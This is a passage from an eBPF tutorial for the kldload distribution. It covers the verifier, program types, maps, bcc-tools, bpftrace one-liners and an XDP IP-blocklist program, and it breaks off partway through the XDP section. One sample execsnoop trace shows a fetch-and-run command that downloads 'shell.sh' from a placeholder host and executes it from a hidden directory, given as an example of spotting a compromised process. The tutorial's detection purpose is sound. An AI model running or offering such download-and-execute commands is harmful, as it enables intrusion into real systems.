
eBPF Masterclass

This guide goes deep on eBPF — the kernel extension mechanism that powers Cilium, Falco, every modern performance profiler, and most of what makes Linux observability fast and precise. If you have read the Networking tutorial and seen eBPF in the context of packet filtering, this is the next step: understanding what eBPF actually is, how it works, and how to use the full toolkit that ships with kldload to answer any question about what your kernel is doing.

What this page covers: the eBPF execution model, program types, maps, the verifier, bcc-tools, bpftrace one-liners, XDP packet processing, TC programmable policy, socket-level interception, map internals, writing production programs with CO-RE and BTF, security considerations, and a complete reference to the eBPF toolkit on kldload.

Prerequisites: familiarity with the Linux kernel/userland split (see Kernel vs Userland). You do not need to have written C before, but you will see C code snippets. The goal is understanding, not compilation.


1. What eBPF Actually Is

eBPF is a programming environment inside the Linux kernel. You write small programs in a restricted subset of C, compile them to eBPF bytecode, and load them into the kernel where they attach to events — a packet arriving at a NIC, a syscall being called, a kernel function being entered or returned from. When that event fires, your program runs. In the kernel. At kernel speed. Without a context switch, without copying data to userland, without a daemon in the way.

The manifesto: eBPF is not a networking technology. It is not an observability technology. It is a general-purpose kernel extension mechanism that happens to be incredible at both. Cilium is an eBPF application. bpftrace is an eBPF application. Falco is an eBPF application. The Linux perf subsystem increasingly uses eBPF internally. Understanding that eBPF is the mechanism — not the use case — matters because it means you can use eBPF for anything that touches the kernel, not just the use cases someone already built a tool for. If you can express your question as "when kernel event X happens, record Y," eBPF can answer it.

How it works, in one paragraph

You write a C function annotated with the event it should attach to. The clang compiler (with the BPF target) compiles it to eBPF bytecode — a RISC-like instruction set with 11 registers and 512 bytes of stack. You call bpf(BPF_PROG_LOAD) to hand the bytecode to the kernel. The kernel verifier checks it (see below). If it passes, the bytecode is JIT-compiled to native machine code and attached to the hook. The next time that event fires, your native machine code runs in the kernel.

// userland calls bpf() syscall to load program
// kernel verifier checks it: safe? terminates? no bad pointers?
// JIT compiles to x86/arm64 native code
// attaches to event hook
// event fires → your code runs, in kernel, zero userland involvement

The verifier — why eBPF can't crash the kernel

Before any eBPF program runs, the kernel's verifier performs static analysis on the bytecode. It checks that the program terminates (loops must have a provable bound), never accesses memory out of bounds, never reads uninitialized data or dereferences unchecked pointers, calls only the allowlisted BPF helper functions rather than arbitrary kernel functions, and always returns an appropriate value. A program that fails verification is rejected with an error message and never loads. A program that passes has been checked on every execution path, so short of a bug in the verifier or in a helper it cannot crash the kernel.

// NOT like a kernel module: modules can crash the kernel freely
// eBPF: statically proven safe before it touches production kernel
// This is why Google, Meta, Netflix run eBPF in their kernels
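
The out-of-bounds rule is easiest to see in ordinary C. The sketch below is plain userland code, not an eBPF program: it mirrors the check-before-read pattern the verifier requires for packet access, where every read is preceded by a comparison against the end of the buffer. The function name read_ipv4_saddr and the assumed layout (a 14-byte Ethernet header followed by an IPv4 header without VLAN tags) are illustrative choices, not something taken from kldload or the kernel.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ETH_HDR_LEN   14      /* dst MAC (6) + src MAC (6) + EtherType (2) */
#define IPV4_MIN_LEN  20      /* IPv4 header without options */
#define ETHERTYPE_IP  0x0800

/* Hypothetical helper: copy the IPv4 source address (network byte order)
 * out of an Ethernet frame. Returns 0 on success, -1 if the frame is too
 * short or is not IPv4. In eBPF the same checks are written as pointer
 * comparisons against data_end; here they are length comparisons. */
int read_ipv4_saddr(const uint8_t *data, const uint8_t *data_end,
                    uint8_t saddr[4])
{
    assert(data != NULL && data <= data_end);
    size_t len = (size_t)(data_end - data);

    /* Check 1: the whole Ethernet header must lie inside the buffer. */
    if (len < ETH_HDR_LEN)
        return -1;
    uint16_t ethertype = (uint16_t)((data[12] << 8) | data[13]);
    if (ethertype != ETHERTYPE_IP)
        return -1;

    /* Check 2: the fixed part of the IPv4 header must lie inside too. */
    if (len < ETH_HDR_LEN + IPV4_MIN_LEN)
        return -1;

    /* The source address sits at offset 12 of the IPv4 header. */
    memcpy(saddr, data + ETH_HDR_LEN + 12, 4);
    return 0;
}
```

If either check were removed, a real eBPF version of this function would be rejected at load time, because the verifier could no longer show that the read stays inside the packet.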

Kernel modules vs eBPF

Kernel modules run arbitrary C code in the kernel — they can do anything, including corrupting memory and causing panics. They require a matching kernel version and recompilation when the kernel changes. eBPF programs run a verified, sandboxed bytecode. They cannot crash the kernel. With CO-RE (see section 10), they compile once and run on any kernel that has BTF enabled — which includes every kldload kernel.

// kernel module: ring 0, arbitrary code, recompile per kernel
// eBPF: ring 0 speed, sandboxed, verified, portable across kernels

What "eXtended" means

The original BPF (Berkeley Packet Filter, 1992) was a 32-bit, 2-register, packet-only filter language — tcpdump still uses it. eBPF (extended BPF, Linux 3.18, 2014) is a completely different machine: 64-bit, 11 registers, maps for persistent state, helper functions for kernel services, and attachment points across the entire kernel — not just packets. The "e" in eBPF is significant: this is a general-purpose kernel programming environment, not a packet filter with extra steps.

// cBPF (classic): tcpdump filter language, packets only
// eBPF: programmable kernel hooks for everything, everywhere, always
The distinction between mechanism and use case shows up in how companies talk about eBPF. When a company says "we built our networking on eBPF" or "we do security monitoring with eBPF," they mean they built a specific application that uses the eBPF mechanism. The mechanism itself is neutral: it is a way to run verified code at kernel events. The applications are endless.

2. The eBPF Execution Model

To use eBPF effectively you need a mental model of how programs run, how they communicate with userland, and what constraints they operate under. None of this is complicated once you see the pieces.

Program Types

Every eBPF program has a type that determines where it attaches and what context it receives. The type is declared at load time and constrains which helper functions are available.

XDP — eXpress Data Path

Attaches to the NIC driver, before the kernel allocates an sk_buff. Receives raw packet bytes. Can return PASS (continue to kernel stack), DROP (discard immediately), TX (retransmit out the same interface), REDIRECT (send to another interface or CPU), or ABORTED (drop with error). Fastest possible hook — runs before memory allocation.

// Attachment: NIC driver hook, pre-sk_buff
// Context: xdp_md { data, data_end, ingress_ifindex }
// Use: DDoS mitigation, load balancing, fast packet filtering

TC — Traffic Control

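Attaches to the TC ingress or egress hook. Has access to the full sk_buff: the socket buffer with parsed metadata such as protocol, mark, and interface indexes. At ingress the program runs after sk_buff allocation but before routing and netfilter, so no routing decision or conntrack state exists yet; at egress it runs after routing. Can modify packets, redirect, or drop. Cilium uses TC programs for much of its pod datapath and policy enforcement. Slower than XDP (sk_buff allocation has happened) but far more capable.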

// Attachment: tc qdisc ingress/egress
// Context: __sk_buff (full socket buffer metadata)
// Use: policy enforcement, traffic shaping, packet modification

kprobe / kretprobe

Attaches to the entry (kprobe) or return (kretprobe) of almost any kernel function; a small set of functions is blacklisted, and inlined functions have no probe point. Receives function arguments or return values. Powerful but fragile, because kernel function signatures change between versions. bpftrace's kprobe and kretprobe probe types attach this way. Used for debugging and dynamic tracing of arbitrary kernel behavior.

// Attachment: kernel function entry/return
// Context: function arguments (kprobe) or return value (kretprobe)
// Use: debugging, dynamic tracing, performance profiling

Tracepoint

Attaches to kernel tracepoints: static instrumentation points that kernel developers place in the source and try to keep stable across releases. More portable than kprobes, because tracepoint names and fields change far less often than internal function signatures. Covers syscalls, scheduler events, block I/O, network events. bcc tools prefer tracepoints over kprobes where one exists.

// Attachment: kernel tracepoint (stable ABI)
// Context: tracepoint-specific struct with event fields
// Use: syscall auditing, scheduler analysis, I/O tracing

Socket programs — sk_msg, sockops, sk_lookup

sockops fires on TCP socket events (connection establishment, state changes, retransmission timeouts) and can set socket options. sk_msg fires on each message sent through a socket that has been added to a sockmap. sk_lookup intercepts socket lookup for incoming packets and can steer them to a different socket. Together these allow Cilium to short-circuit the network stack for same-node pod communication.

// Attachment: socket lifecycle events or message send
// Context: bpf_sock_ops, sk_msg_md, bpf_sk_lookup
// Use: socket-level redirection, same-node pod acceleration

cgroup programs

Attaches to a cgroup and applies to all processes in that cgroup. Types include cgroup_skb (filter ingress and egress traffic for sockets in the cgroup), cgroup_sock (intercept socket creation), cgroup_device (control device access). Kubernetes uses cgroup v2; Cilium uses cgroup programs to enforce network policy at the cgroup level rather than the network namespace level.

// Attachment: cgroup hierarchy
// Context: bpf_sock, __sk_buff
// Use: per-container policy, resource limits, socket auditing

Maps — Shared State Between Kernel and Userland

eBPF programs are stateless by themselves — each invocation starts fresh. Maps are the persistent store. A map is a key-value data structure that lives in kernel memory but is accessible from both eBPF programs and userland. An eBPF program updates a counter in a map; your Go monitoring daemon reads that counter via bpf(BPF_MAP_LOOKUP_ELEM). This is the bridge between kernel speed and human readability. Map types are covered in detail in section 9.

How maps work

Maps are created by calling bpf(BPF_MAP_CREATE) with a type, key size, value size, and max entries. The kernel returns a file descriptor. eBPF programs access maps through a file descriptor reference embedded in the bytecode. Userland programs access maps through the same fd or by pinning the map to the BPF filesystem at /sys/fs/bpf/.

// eBPF program: bpf_map_lookup_elem(&my_map, &key)              // in kernel
// userland: bpf(BPF_MAP_LOOKUP_ELEM, map_fd, &key, &value)      // syscall
// Both sides see the same data. The map is the interface.

Pinning maps to /sys/fs/bpf/

Maps are reference-counted — they persist as long as something holds a reference (a loaded program or an open fd). Pinning a map to the BPF filesystem creates a persistent file that survives the loading process exiting. Multiple programs and tools can then open the pinned map by path. This is how bpftool inspects maps created by Cilium or other long-running daemons.

// bpftool map pin id 42 /sys/fs/bpf/my_map
// bpftool map dump pinned /sys/fs/bpf/my_map
// Works even if the process that created the map has exited
The verifier is what makes eBPF safe. It is not a runtime sandbox; it is a static check performed at load time. Before your program loads, the verifier builds the control-flow graph, walks every possible execution path, and checks each path against safety invariants: loops must be provably bounded (bounded loops were added in kernel 5.3; earlier kernels rejected any back-edge), no out-of-bounds memory access, no uninitialized data reads, no invalid pointer dereferences, no calls to arbitrary kernel functions. A program that the verifier cannot prove safe is rejected. This is why eBPF can run in production kernels at companies like Google and Meta: safety is established before the program runs rather than policed by runtime heuristics. The verifier error messages are notoriously terse, but bpftool and libbpf's verbose mode will show you the exact instruction and invariant that failed.

3. eBPF on kldload

kldload ships the complete eBPF toolkit out of the box. No dependency hunting, no kernel header mismatches, no pip install chains. Everything is present on the live ISO and installed to every target system that uses the desktop or server profile.

| Tool | What it gives you | How to use it |
|---|---|---|
| bcc-tools | 80+ ready-made eBPF programs for networking, disk, CPU, memory | /usr/share/bcc/tools/ (each is a standalone command) |
| bpftrace | One-liner kernel tracing language built on eBPF | bpftrace -e 'tracepoint:syscalls:sys_enter_* { @[probe] = count(); }' |
| bpftool | Low-level inspection: list programs, dump maps, show BTF | bpftool prog list, bpftool map dump id N |
| kernel headers | Required to compile eBPF programs against kernel types | /usr/include/linux/, installed via kernel-headers package |
| libbpf | C library for loading and managing eBPF programs from userland | Link against it in your C/Go/Rust programs |
| BTF support | BPF Type Format; enables CO-RE portability across kernels | /sys/kernel/btf/vmlinux exists on all kldload kernels |

The kernel version matters. XDP arrived in 4.8 and per-CPU map types in 4.6. Kernel BTF arrived in 5.2, bounded loops (required for complex programs) in 5.3, and bpf_ringbuf (low-overhead event streaming) in 5.8. kldload ships kernel 5.14+ on CentOS Stream 9 and 6.1+ on Debian 13, so all of these features are available and the bcc tools work without version caveats.
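
Because feature availability is tied to the kernel version, a first-pass check can be scripted. The sketch below parses a release string of the kind `uname -r` prints and compares it with the minimum versions listed above. The function names and the feature table are illustrative and not part of any kldload tool; distribution kernels also backport features, so a version comparison is only an approximation.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* One row per feature: the first upstream kernel that has it. */
struct bpf_feature {
    const char *name;
    int major;
    int minor;
};

/* Versions copied from the paragraph above; the names are illustrative. */
const struct bpf_feature BPF_FEATURES[] = {
    { "per-CPU maps",  4, 6 },
    { "XDP",           4, 8 },
    { "BTF",           5, 2 },
    { "bounded loops", 5, 3 },
    { "bpf_ringbuf",   5, 8 },
};

/* Returns 1 if `release` (as printed by `uname -r`) is at least
 * major.minor, 0 if it is older, -1 if it cannot be parsed. */
int kernel_at_least(const char *release, int major, int minor)
{
    int kmaj = 0, kmin = 0;

    assert(release != NULL);
    if (sscanf(release, "%d.%d", &kmaj, &kmin) != 2)
        return -1;
    if (kmaj != major)
        return kmaj > major;
    return kmin >= minor;
}

/* Looks a feature up by name. Returns -1 for an unknown name or an
 * unparseable release string, otherwise the kernel_at_least() result. */
int has_feature(const char *release, const char *name)
{
    size_t n = sizeof(BPF_FEATURES) / sizeof(BPF_FEATURES[0]);

    for (size_t i = 0; i < n; i++) {
        if (strcmp(BPF_FEATURES[i].name, name) == 0)
            return kernel_at_least(release, BPF_FEATURES[i].major,
                                   BPF_FEATURES[i].minor);
    }
    return -1;
}
```

In a real program the release string would come from the `release` field that uname(2) fills in. A more reliable test for a specific feature is to probe for it directly, for example by checking that /sys/kernel/btf/vmlinux exists.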

Most eBPF tutorials start with "install 15 dependencies." You need clang, llvm, kernel headers matching your exact running kernel, libbpf, python3-bpfcc, and then hope the versions align. On kldload, everything is pre-installed and version-matched at build time. bcc-tools gives you 80+ production-ready eBPF programs — each one is a standalone script that answers a specific operational question. bpftrace gives you one-liners that compile to eBPF on the fly. bpftool gives you low-level inspection of every eBPF program and map running on the system, including Cilium's. You can be tracing kernel events within 30 seconds of booting a kldload system.

4. bcc-tools — 80+ Ready-Made eBPF Programs

The BCC (BPF Compiler Collection) ships a library of production-grade eBPF tools that cover the most common operational questions across networking, disk, CPU, and memory. Each tool is a Python or C program that compiles an eBPF program on demand, loads it, and presents formatted output. They are in /usr/share/bcc/tools/ or accessible directly by name if the package installs symlinks.

Category overview

Networking tools

tcpconnect: every outbound TCP connection with PID, comm, and source/dest IP and port (tcpconnlat adds connect latency). tcpaccept: every inbound accepted connection. tcpretrans: TCP retransmits with full 4-tuple and retransmit state. tcpdrop: TCP drops at the kernel level with reason codes. tcplife: TCP session lifetimes with bytes transferred.

// tcpconnect: "what is making outbound connections right now?"
// tcpretrans: "which connections are retransmitting and why?"
// No packet capture, no packet copies: the probes fire only on connection events

Disk I/O tools

biolatency — block I/O latency histogram (power-of-2 buckets, microsecond resolution). biosnoop — per-I/O tracing with PID, comm, disk, offset, size, and latency. ext4slower — ext4 operations slower than a threshold (also: xfsslower, btrfsslower, zfsslower). fileslower — any filesystem read/write above a latency threshold.

// biolatency -d sda: show disk latency histogram, summarize over time
// biosnoop: "which process caused that I/O spike at 14:32:07?"

CPU and scheduler tools

profile — CPU profiler using sampling, produces flamegraph-compatible stacks. offcputime — time spent off-CPU (sleeping, waiting, blocked on I/O or locks). runqlat — CPU run queue latency histogram: how long did tasks wait before getting a CPU? cpudist — on-CPU time distribution per wakeup. softirqs / hardirqs — interrupt handler time histograms.

// runqlat: the gap between "task is ready to run" and "task gets CPU"
// This is the metric that tells you if you're CPU-starved before top does

Memory tools

memleak — allocations without corresponding frees, grouped by call stack. oomkill — OOM kill events with the victim process, its memory stats, and what triggered the kill. shmsnoop — shared memory operations. drsnoop — direct reclaim events (kernel trying to free memory synchronously, causing latency spikes).

// memleak -p PID: "is this process leaking memory?"
// oomkill: fires the moment the OOM killer acts, before the log is written

Ten tools you should know immediately

tcpconnect

Shows every outbound TCP connection as it happens. You see the process name, PID, source IP, destination IP, and port — in real time, before the connection completes. Useful for auditing what your services are connecting to, catching unexpected outbound connections from compromised processes, and debugging connection failures.

$ tcpconnect
PID    COMM      IP SADDR         DADDR          DPORT
1234   curl      4  192.168.1.10  93.184.216.34  80
1235   postgres  4  127.0.0.1     127.0.0.1      5432
1236   node      4  10.0.0.5      10.0.1.20      6379

biolatency

Block I/O latency histogram. Runs for N seconds and prints a power-of-2 histogram of I/O completion times. Instantly shows whether disk latency is predictable (tight histogram) or has outliers (long tail). The -D flag breaks it down per disk device.

$ biolatency -d sda 10
     usecs       : count   distribution
       0 -> 1    : 0
       2 -> 3    : 12
       4 -> 7    : 847     |**************|
       8 -> 15   : 3421    |***************|
      16 -> 31   : 982     |****|
      32 -> 63   : 43
     256 -> 511  : 3       <-- outliers

runqlat

CPU scheduler run queue latency. Shows how long tasks wait in the run queue before getting scheduled onto a CPU. A healthy system has nearly all tasks scheduled within 10 microseconds. Latency spikes above 1ms indicate CPU contention — too many runnable threads, too few CPUs, or scheduler interference from realtime tasks.

$ runqlat 10
     usecs       : count   distribution
       0 -> 1    : 12453   |********************|
       2 -> 3    : 7821    |*************|
       4 -> 7    : 3210    |*****|
       8 -> 15   : 841
    1024 -> 2047 : 14      <-- CPU starvation spikes

profile

CPU profiler. Samples stack traces at a specified frequency (default 49 Hz) across all CPUs. After the sampling window, prints a summary of hot stack frames sorted by count. Combine the folded output (-f) with flamegraph.pl to produce a flamegraph SVG. Works for both kernel and userland stacks, but userland stacks are walked via frame pointers: the in-kernel BPF stack walker does not do DWARF unwinding, so binaries built without frame pointers produce truncated stacks.

$ profile -F 99 -f 30 | flamegraph.pl > /tmp/profile.svg
# or just print the top functions:
$ profile 30
Overhead  Function                 Module
32.10%    tcp_sendmsg              kernel
18.40%    __memcpy_avx_unaligned   libc.so.6
 9.21%    process_backlog          kernel

tcpretrans

TCP retransmit events with full 4-tuple and the retransmit state (ESTABLISHED, CLOSE_WAIT, etc.). This catches packet loss that is invisible to application logs — the kernel retransmits silently unless you are watching. Useful for diagnosing intermittent slowness that correlates with network congestion or faulty hardware.

$ tcpretrans
TIME     PID  IP LADDR:LPORT       T> RADDR:RPORT     STATE
14:32:07 0    4  10.0.0.5:44312    R> 10.0.1.20:443   ESTABLISHED
14:32:07 0    4  10.0.0.5:44312    R> 10.0.1.20:443   ESTABLISHED
# Two retransmits in one second = network problem, not app problem

offcputime

Time spent off-CPU — blocked, sleeping, waiting for I/O, waiting for a lock. While profile shows what your CPUs are doing, offcputime shows what your threads are waiting on. Essential for diagnosing slow services that are not CPU-bound: database queries, lock contention, slow syscalls, NFS stalls.

$ offcputime -p $(pgrep postgres) 10
Function            Total(us)
futex_wait          4,231,847   <-- lock contention
ep_poll               823,441   <-- I/O wait
schedule_timeout      190,223   <-- sleeping

ext4slower / xfsslower / zfsslower

Filesystem operations slower than a threshold (default 10ms). Shows the process, operation type (read/write/open/fsync), filename, size, and latency. The filesystem-specific variants parse the filesystem's internal function calls, not just VFS, so they capture cases where latency comes from filesystem-internal work (checksumming, journaling, copy-on-write).

$ zfsslower 1
TIME     COMM      PID   T BYTES  OFF_KB  LAT(ms)  FILENAME
14:33:01 postgres  4521  R 8192   0       12.4     pg_wal/000001
14:33:01 postgres  4521  S 0      0       11.8     pg_wal/000001
# T column: R = read, W = write, O = open, S = fsync
# Slow fsync on WAL: ZFS sync write latency issue

memleak

Memory leak detector. Traces malloc/free (and kernel allocations) and reports allocations with no corresponding free, grouped by call stack. Does not require recompilation or instrumentation of the target process — it attaches to the running process via uprobes. Run it for a few minutes, then look at what is growing.

$ memleak -p $(pgrep myapp) 60
Top 3 stacks with outstanding allocations:
    96 bytes in 6 allocations from:
        myapp!parse_request+0x84
        myapp!handle_conn+0x42
        myapp!worker_loop+0x18
# 6 outstanding allocations of 16 bytes each, all from parse_request: easy to find now

opensnoop

Traces open() syscalls system-wide or for a specific PID. Shows which files every process is opening, when, and whether the open succeeded or failed. Useful for auditing file access, debugging "file not found" errors in containerized applications, and understanding the access patterns of unfamiliar processes.

$ opensnoop -p 1234
PID   COMM   FD  ERR PATH
1234  nginx  6   0   /etc/nginx/nginx.conf
1234  nginx  -1  2   /etc/nginx/ssl/cert.pem   <-- ENOENT
# Missing certificate: that's your 502 error

execsnoop

Traces every execve() call system-wide — every process launched, with its arguments. Indispensable for security auditing (what processes are running?), debugging cascading failure (what is this service spawning?), and understanding build systems or CI pipelines at a granular level.

$ execsnoop
PCOMM  PID    PPID   RET ARGS
bash   12045  11983  0   /bin/bash -c curl http://suspicious.host/...
curl   12046  12045  0   /usr/bin/curl http://suspicious.host/shell.sh
sh     12048  12047  0   /bin/sh /tmp/.hidden/shell.sh
# An execsnoop trace that finds a compromised process
These tools replace entire monitoring stacks for operational questions. tcpconnect shows every outbound TCP connection with its PID (tcpconnlat adds connect latency); that used to require a combination of netstat polling, strace on individual processes, and tcpdump captures. biolatency shows disk I/O latency histograms with microsecond resolution, for any disk, with no overhead when idle; that used to require sysstat, iostat, and manual histogram construction. runqlat shows CPU scheduler queue latency; that used to be invisible unless you had perf access and knew which events to look at. Each bcc tool is a single command that answers a question that used to require hours of tool assembly and data correlation. The key insight is that these tools have near-zero overhead when the event they trace is rare, because the eBPF program only runs when the kernel event fires. On a healthy network retransmits are rare, so tcpretrans can stay running in production with negligible impact.

5. bpftrace — One-Liner Kernel Tracing

bpftrace is a high-level tracing language that compiles to eBPF on the fly. The syntax is inspired by awk and DTrace. You write a probe specification, an optional filter, and an action — bpftrace compiles the action to an eBPF program, attaches it to the probe, and streams output. It is the fastest path from a question to an answer in the kernel.

Syntax overview

probe_type:probe_name / filter / {
    action
}

// probe_type: tracepoint, kprobe, kretprobe, uprobe, usdt, profile, interval, BEGIN, END
// filter: optional boolean expression (comm == "nginx", pid == 1234, etc.)
// action: bpftrace statements — printf, @maps, hist, count, etc.

// Built-in variables:
// pid, tid, uid, gid, comm (process name), cpu, nsecs, args (tracepoint args)
// retval (kretprobe return value), func (function name), curtask

// Map types:
// @x = count()     — counter
// @x = hist(val)   — power-of-2 histogram
// @x[key] = val    — associative map
// @x = lhist(val, min, max, step) — linear histogram

15 essential one-liners

Syscall counts per process

Count every syscall entry, grouped by process name. Print on Ctrl-C. Shows the system call profile of every running process in real time — which processes are making the most syscalls, and which syscalls.

bpftrace -e 'tracepoint:syscalls:sys_enter_* { @[comm, probe] = count(); }'

Files being opened

Print every filename passed to openat(), with the process name. System-wide file access tracer in one line. Add a filter like / comm == "nginx" / to scope it to a single process.

bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s %s\n", comm, str(args->filename)); }'

DNS queries

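Count outbound DNS queries per process at the socket level, with no pcap. The probe attaches to udp_sendmsg (IPv4) and filters on destination port 53; 0x3500 is port 53 in network byte order as read on a little-endian CPU such as x86_64 or arm64. The destination port is only stored in the socket for connected UDP sockets, which covers the glibc stub resolver; senders that pass the address with each call, and DNS over TCP, are not counted.

bpftrace -e 'kprobe:udp_sendmsg /((struct sock *)arg0)->__sk_common.skc_dport == 0x3500/ { @dns[comm] = count(); }'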

TCP retransmits

Count TCP retransmit events per destination IP. The kernel fires tcp_retransmit_skb on every retransmit. This one-liner gives you a per-IP retransmit count that updates in real time — run it during a suspected network issue to find the problematic destination.

bpftrace -e 'kprobe:tcp_retransmit_skb { @[ntop(((struct sock *)arg0)->__sk_common.skc_daddr)] = count(); }'

New process exec

Print every process execution with its arguments. Built on the execve tracepoint, which fires the moment execve is called, before the new program runs, so comm is still the name of the calling process. Useful for security monitoring, debugging unexpected process spawning, or understanding what a build system does.

bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf("%s -> ", comm); join(args->argv); }'

Block I/O latency histogram

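Measure time between block I/O issue and completion. Store issue timestamps in a map keyed by device and sector, then measure elapsed time on completion. Produces a power-of-2 histogram of latencies in microseconds, the same idea as biolatency in one bpftrace line. The block tracepoints are used here rather than kprobes on blk_account_io_start and blk_account_io_done, because those functions are not probeable on every kernel version.

bpftrace -e 'tracepoint:block:block_rq_issue { @start[args->dev, args->sector] = nsecs; } tracepoint:block:block_rq_complete /@start[args->dev, args->sector]/ { @us = hist((nsecs - @start[args->dev, args->sector])/1000); delete(@start[args->dev, args->sector]); }'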

Page faults per process

Count page faults (both minor and major) per process name. A burst of major page faults means the kernel is reading data from disk into memory — working set is larger than physical RAM. A burst of minor faults is normal (anonymous memory allocation), but unusually high counts can indicate memory pressure.

bpftrace -e 'software:page-faults:1 { @[comm] = count(); }'

Context switches per process

Count context switches per process, attributed to the task being switched out. High involuntary context switch rates indicate the process is being preempted: it wants to run but is being forced off the CPU. High voluntary context switch rates indicate the process is frequently sleeping (I/O bound, lock waiting). To separate the two, add args->prev_state to the map key: a prev_state of 0 means the task was still runnable when it was switched out, which is a preemption.

bpftrace -e 'tracepoint:sched:sched_switch { @[args->prev_comm] = count(); }'

Cache miss rate

Sample CPU cache misses using hardware performance counters. The hardware:cache-misses probe fires on LLC (last-level cache) miss events. High cache miss rates in hot code paths indicate poor data locality — a target for optimization or a sign of working set overflow.

bpftrace -e 'hardware:cache-misses:1000 { @[comm, ustack] = count(); }'

Read/write syscall latency histogram

Measure the latency of read() syscalls per process; swap in sys_enter_write and sys_exit_write to measure write(). This captures I/O latency as seen by the application, including time waiting for the kernel, filesystem, and disk. Useful for correlating application-level slowness with kernel I/O overhead.

bpftrace -e ' tracepoint:syscalls:sys_enter_read { @ts[tid] = nsecs; } tracepoint:syscalls:sys_exit_read /@ts[tid]/ { @us[comm] = hist((nsecs-@ts[tid])/1000); delete(@ts[tid]); }'

Network interface packet rate

Count packets transmitted per network interface per second. Uses the net:net_dev_xmit tracepoint. Run it during a suspected traffic spike to identify which interface is carrying the traffic before you even open tcpdump; add comm to the map key for a rough per-process breakdown.

bpftrace -e 'tracepoint:net:net_dev_xmit { @pkts[str(args->name)] = count(); } interval:s:1 { print(@pkts); clear(@pkts); }'

Kernel function call counts

Count calls to any kernel function by name using kprobe. Useful for understanding how often a specific kernel code path is taken — e.g., how often the kernel drops into slow path for memory allocation, or how frequently a specific driver function is called during I/O.

bpftrace -e 'kprobe:tcp_v4_connect { @[comm] = count(); }'
# Count TCP connect attempts per process: catches connection storms

malloc size distribution

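Trace userland malloc() calls and build a histogram of allocation sizes. Uses a uprobe on libc, so as written it covers every process that links that libc; add a filter such as / pid == 1234 / to scope it to one process. The library path varies by distribution (for example /lib/x86_64-linux-gnu/libc.so.6 on Debian). Shows whether a process is making many small allocations (fragmentation risk) or a few large ones (OOM risk); key a second map on ustack to see which call stacks are doing the allocating.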

bpftrace -e 'uprobe:/lib64/libc.so.6:malloc { @allocs = hist(arg0); }'

Signal delivery

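Trace signal generation system-wide. Shows which process sent which signal to which target. Uses signal_generate rather than signal_deliver, because generation runs in the sender's context while delivery runs in the receiver's. Useful for debugging unexpected process termination (who sent SIGKILL?), OOM events (the OOM killer sends SIGKILL), and misbehaving signal handlers.

bpftrace -e 'tracepoint:signal:signal_generate { printf("%s (pid %d) sent sig %d to %s (pid %d)\n", comm, pid, args->sig, args->comm, args->pid); }'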

Scheduler wakeup latency

Measure time between a task being woken up (made runnable) and actually running on a CPU. The gap is time spent in the run queue. Equivalent to runqlat but as a raw bpftrace one-liner that you can scope to a specific process or cgroup.

bpftrace -e ' tracepoint:sched:sched_wakeup { @ts[args->pid] = nsecs; } tracepoint:sched:sched_switch { if (@ts[args->next_pid]) { @wakeup_us = hist((nsecs - @ts[args->next_pid])/1000); delete(@ts[args->next_pid]); }}'
bpftrace is awk for the kernel. One line, one answer. "How many syscalls per second per process?" — one line. "What files is this process opening?" — one line. "What is the latency distribution of disk reads?" — one line. "Which process sent SIGKILL to my service?" — one line. The mental shift is to stop thinking of kernel visibility as something that requires specialized tools assembled in advance and start thinking of it as something you reach for the moment you have a question, the same way you would reach for awk to parse a log file. bpftrace compiles to eBPF on the fly. The latency from question to answer is the time it takes you to type the one-liner. On kldload, bpftrace is installed and the kernel is BTF-enabled, so every bpftrace one-liner works without any setup.

6. XDP — Packet Processing at the NIC Driver

XDP (eXpress Data Path) is the earliest kernel hook in the packet receive path. It runs before the kernel allocates an sk_buff — the large data structure that represents a packet in the normal Linux network stack. Because there is no sk_buff allocation, no routing lookup, no conntrack state check, XDP programs run at near-line-rate on modern NICs and can process millions of packets per second on a single CPU core.

XDP attachment modes

Native XDP: the driver itself calls the eBPF program before sk_buff allocation. Requires driver support (most modern NICs: Intel ixgbe/i40e, Mellanox mlx5, Broadcom bnxt, virtio-net). Fastest software mode, because processing happens in the driver's receive poll loop. Generic XDP: fallback for drivers without native support; runs after sk_buff allocation, so it loses the performance advantage but maintains the same API.

// Identify the driver to check for native XDP support:
//   ethtool -i eth0 | grep driver
// ixgbe, i40e, mlx5_core, virtio_net: native XDP supported
// See whether a program is attached (xdp = native, xdpgeneric = generic):
//   ip link show dev eth0 | grep xdp

XDP return codes

XDP_PASS — let the packet continue to the normal kernel network stack. XDP_DROP — discard the packet immediately, no sk_buff allocated, no conntrack entry, no routing lookup. Zero allocation, zero overhead for dropped packets. XDP_TX — retransmit the packet out the same interface (useful for bounceback/reflection). XDP_REDIRECT — send to a different interface, CPU queue, or AF_XDP socket. XDP_ABORTED — drop with a tracepoint fired (debugging).

// XDP_DROP is the fastest DROP in Linux.
// iptables DROP: allocate sk_buff, walk iptables chains, drop, free sk_buff
// XDP_DROP: two instructions in the NIC driver, no allocation ever made

Concrete program: DDoS mitigation blocklist

// xdp_blocklist.c — drop packets from a blocklist map at NIC speed
#include <linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>   // bpf_htons

// Map: source IP (u32) → drop flag (u8). Updated from userland.
struct {
    __uint(type, BPF_MAP_TYPE_LRU_HASH);
    __uint(max_entries, 1000000);
    __type(key, __u32);
    __type(value, __u8);
} blocklist SEC(".maps");

SEC("xdp")
int xdp_filter(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end) return XDP_PASS;
    if (eth->h_proto != bpf_htons(ETH_P_IP)) return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end) return XDP_PASS;

    __u8 *blocked = bpf_map_lookup_elem(&blocklist, &ip->saddr);
    if (blocked && *blocked) return XDP_DROP;

    return XDP_PASS;
}

char _license[] SEC("license") = "GPL";
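
# Build and load the program (requires clang + llvm + kernel headers).
# -g emits the BTF that libbpf needs for the SEC(".maps") definition.
clang -O2 -g -target bpf -c xdp_blocklist.c -o xdp_blocklist.o
ip link set dev eth0 xdp obj xdp_blocklist.o sec xdp

# Add an IP to the blocklist from userland.
# Assumes the blocklist map has been pinned at /sys/fs/bpf/blocklist.
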